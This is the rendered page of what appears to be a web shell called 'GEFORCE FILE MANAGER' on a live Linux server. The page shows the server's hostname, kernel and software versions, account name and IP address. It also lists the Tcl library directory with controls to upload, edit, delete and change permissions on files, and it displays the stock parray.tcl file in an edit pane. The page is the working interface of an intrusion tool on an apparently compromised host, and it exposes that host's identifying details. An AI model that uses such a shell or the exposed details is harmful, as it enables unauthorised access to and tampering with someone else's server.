[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
tcl8.6
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 encoding
SET
[ DEL ]
📁 http1.0
SET
[ DEL ]
📁 msgs
SET
[ DEL ]
📁 opt0.4
SET
[ DEL ]
📄 auto.tcl
21,344 B
SET
[ EDIT ]
|
[ DEL ]
📄 clock.tcl
128,934 B
SET
[ EDIT ]
|
[ DEL ]
📄 history.tcl
7,900 B
SET
[ EDIT ]
|
[ DEL ]
📄 init.tcl
24,249 B
SET
[ EDIT ]
|
[ DEL ]
📄 package.tcl
22,959 B
SET
[ EDIT ]
|
[ DEL ]
📄 parray.tcl
816 B
SET
[ EDIT ]
|
[ DEL ]
📄 safe.tcl
33,439 B
SET
[ EDIT ]
|
[ DEL ]
📄 tclDTrace.d
7,347 B
SET
[ EDIT ]
|
[ DEL ]
📄 tclIndex
5,415 B
SET
[ EDIT ]
|
[ DEL ]
📄 tm.tcl
11,633 B
SET
[ EDIT ]
|
[ DEL ]
📄 word.tcl
4,860 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: parray.tcl
# parray: # Print the contents of a global array on stdout. # # Copyright (c) 1991-1993 The Regents of the University of California. # Copyright (c) 1994 Sun Microsystems, Inc. # # See the file "license.terms" for information on usage and redistribution # of this file, and for a DISCLAIMER OF ALL WARRANTIES. # proc parray {a {pattern *}} { upvar 1 $a array if {![array exists array]} { return -code error "\"$a\" isn't an array" } set maxl 0 set names [lsort [array names array $pattern]] foreach name $names { if {[string length $name] > $maxl} { set maxl [string length $name] } } set maxl [expr {$maxl + [string length $a] + 2}] foreach name $names { set nameString [format %s(%s) $a $name] puts stdout [format "%-*s = %s" $maxl $nameString $array($name)] } }